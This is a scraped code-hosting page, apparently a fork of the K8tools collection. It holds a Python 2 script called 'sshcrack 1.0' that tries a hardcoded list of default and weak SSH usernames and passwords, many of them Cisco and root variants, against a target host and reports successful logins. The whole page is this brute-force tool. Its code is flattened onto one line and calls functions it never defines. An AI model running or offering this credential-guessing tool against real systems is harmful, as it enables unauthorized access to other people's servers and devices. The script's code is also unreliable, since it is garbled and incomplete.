同步操作将从 bxqtee/K8tools 强制同步,此操作会覆盖自 Fork 仓库以来所做的任何修改,且无法恢复!!!
确定后同步将在后台操作,完成时将刷新页面,请耐心等待。
#sshcrack 1.0#author: k8gege#https://www.cnblogs.com/k8gege#https://github.com/k8gegeimport paramikoimport sysimport loggingssh = paramiko.SSHClient()ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())logging.raiseExceptions=Falsedef checkSSH(host,port,user,pwd):try:ssh.connect(host,port,user,pwd)print host+' '+port+' '+user+' '+pwd+' LoginOK'checkDns()checkPing()except:passhost=sys.argv[1]port=sys.argv[2]user=sys.argv[3]pwd=sys.argv[4]type=sys.argv[5]if type=='-test':checkSSH(host,port,user,pwd)elif type=='-crack':checkSSH(host,port,'root','123456')checkSSH(host,port,'root','cisco')checkSSH(host,port,'root','Cisco')checkSSH(host,port,'admin','123456')checkSSH(host,port,'cisco','123456')checkSSH(host,port,'cisco','cisco')checkSSH(host,port,'Cisco','Cisco')checkSSH(host,port,'cisco','cisco123')checkSSH(host,port,'admin','admin')checkSSH(host,port,'root','Admin')checkSSH(host,port,'root','toor')checkSSH(host,port,'root','Admin123')checkSSH(host,port,'root','system')checkSSH(host,port,'root','system123')checkSSH(host,port,'root','System')checkSSH(host,port,'root','System123')checkSSH(host,port,'root','Admin123!@#')checkSSH(host,port,'root','root123!@#')checkSSH(host,port,'root','root2019')checkSSH(host,port,'root','root2018')checkSSH(host,port,'root','root2017')checkSSH(host,port,'root','root2016')checkSSH(host,port,'root','root2015')checkSSH(host,port,'root','root2014')checkSSH(host,port,'root','root2013')checkSSH(host,port,'root','root2012')else:checkSSH(host,port,user,pwd)
此处可能存在不合适展示的内容,页面不予展示。您可通过相关编辑功能自查并修改。
如您确认内容无涉及 不当用语 / 纯广告导流 / 暴力 / 低俗色情 / 侵权 / 盗版 / 虚假 / 无价值内容或违法国家有关法律法规的内容,可点击提交进行申诉,我们将尽快为您处理。